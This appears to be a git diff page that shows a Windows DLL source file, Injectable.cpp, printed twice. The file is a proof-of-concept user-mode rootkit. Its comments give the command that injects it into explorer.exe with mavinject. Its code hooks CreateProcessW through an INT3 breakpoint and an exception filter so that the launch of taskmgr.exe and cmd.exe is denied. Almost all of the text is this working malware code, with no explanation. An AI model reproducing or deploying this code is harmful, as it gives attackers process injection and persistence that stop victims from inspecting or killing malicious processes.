isgroup-srl · December 22, 2017 18:59
diff --git a/Injectable.cpp b/Injectable.cpp
 #include <windows.h>
 #include <stdio.h>


 FARPROC fpCreateProcessW;
 BYTE bSavedByte;

 // Blog Post Here:
 // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
 // tasklist | findstr explore.exe
 // mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll
 // 

 BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
 	DWORD dwOldProt = 0;
 	if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE)
 		return FALSE;

 	MoveMemory(fpFunc, b, size);

 	return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
 }


 VOID HookFunction(VOID) {
 	fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW");
 	if (fpCreateProcessW == NULL) {
 		return;
 	}

 	bSavedByte = *(LPBYTE)fpCreateProcessW;

 	const BYTE bInt3 = 0xCC;
 	if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
 		ExitThread(0);
 	}
 }

 BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {
 	
 	if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL ||
 		wcsstr(lpCommandLine, L"cmd.exe") != NULL) {
 		SetLastError(ERROR_ACCESS_DENIED);
 		return FALSE;
 	}

 	if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
 		ExitThread(0);
 	}

 	BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);

 	HookFunction();
 	return b;
 }

 LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
 	if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW)
 		lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW;

 	return EXCEPTION_CONTINUE_EXECUTION;
 }


 BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
 	switch (fdwReason) {
 	case DLL_PROCESS_ATTACH:
 		SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter);
 		::MessageBoxA(NULL,"Boom!","Injected",0);
 		HookFunction();
 		break;
 	}

 	return TRUE;
 }
	#include <windows.h>
	#include <stdio.h>


	FARPROC fpCreateProcessW;
	BYTE bSavedByte;

	// Blog Post Here:
	// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
	// tasklist \| findstr explore.exe
	// mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll
	//

	BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
	DWORD dwOldProt = 0;
	if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE)
	return FALSE;

	MoveMemory(fpFunc, b, size);

	return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
	}


	VOID HookFunction(VOID) {
	fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW");
	if (fpCreateProcessW == NULL) {
	return;
	}

	bSavedByte = *(LPBYTE)fpCreateProcessW;

	const BYTE bInt3 = 0xCC;
	if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) {
	ExitThread(0);
	}
	}

	BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) {

	if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL \|\|
	wcsstr(lpCommandLine, L"cmd.exe") != NULL) {
	SetLastError(ERROR_ACCESS_DENIED);
	return FALSE;
	}

	if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) {
	ExitThread(0);
	}

	BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);

	HookFunction();
	return b;
	}

	LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) {
	if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW)
	lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW;

	return EXCEPTION_CONTINUE_EXECUTION;
	}


	BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
	switch (fdwReason) {
	case DLL_PROCESS_ATTACH:
	SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter);
	::MessageBoxA(NULL,"Boom!","Injected",0);
	HookFunction();
	break;
	}

	return TRUE;
	}